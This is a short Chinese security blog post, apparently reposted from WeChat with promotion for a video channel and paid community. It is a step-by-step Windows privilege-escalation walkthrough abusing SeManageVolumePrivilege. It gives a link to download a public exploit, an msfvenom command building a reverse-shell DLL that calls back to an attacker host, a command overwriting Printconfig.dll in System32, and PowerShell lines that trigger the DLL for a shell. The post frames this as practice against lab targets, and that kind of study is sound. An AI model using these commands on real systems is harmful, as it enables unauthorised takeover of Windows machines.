“ SeManageVolumePrivilege提权手法”
看到了,关注一下不吃亏啊,点个赞转发一下啦,WP看不下去的,可以B站搜:标松君,UP主录的打靶视频,欢迎关注。顺便宣传一下星球:重生者安全, 里面每天会不定期更新OSCP知识点,车联网,渗透红队以及漏洞挖掘工具等信息分享,欢迎加入;以及想挖SRC逻辑漏洞的朋友,可以私聊。
01
—
winodws提权
打windows靶机的时候,如果你的权限里面有
SeManageVolumePrivilege 这个,那么可以使用这个姿势提权:
知识链接:https://github.com/CsEnox/SeManageVolumeExploit
1.下好这个EXP:
https://github.com/CsEnox/SeManageVolumeExploit/releases/download/public/SeManageVolumeExploit.exe
2.在kali上生成dll文件:(根据具体情况改,但是dll的名字别换)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.x.x LPORT=6666 -f dll -o Printconfig.dll
3.将SeManageVolumeExploit.exe,Printconfig.dll上传到靶机
4.运行SeManageVolumeExploit.exe
运行这个脚本后,你应该有写入C盘的权限
5.移动Printconfig.dll到目标位置:
move .Printconfig.dll C:WindowsSystem32spooldriversx643Printconfig.dll
#这里可能存在同名的dll,直接覆盖就好了
6.依次运行下面两行代码:
$type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
$object = [Activator]::CreateInstance($type)
查看kali监听端口应该已经有shell弹回连了
原文始发于微信公众号(道玄网安驿站):windows提权之SeManageVolumePrivilege提权
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论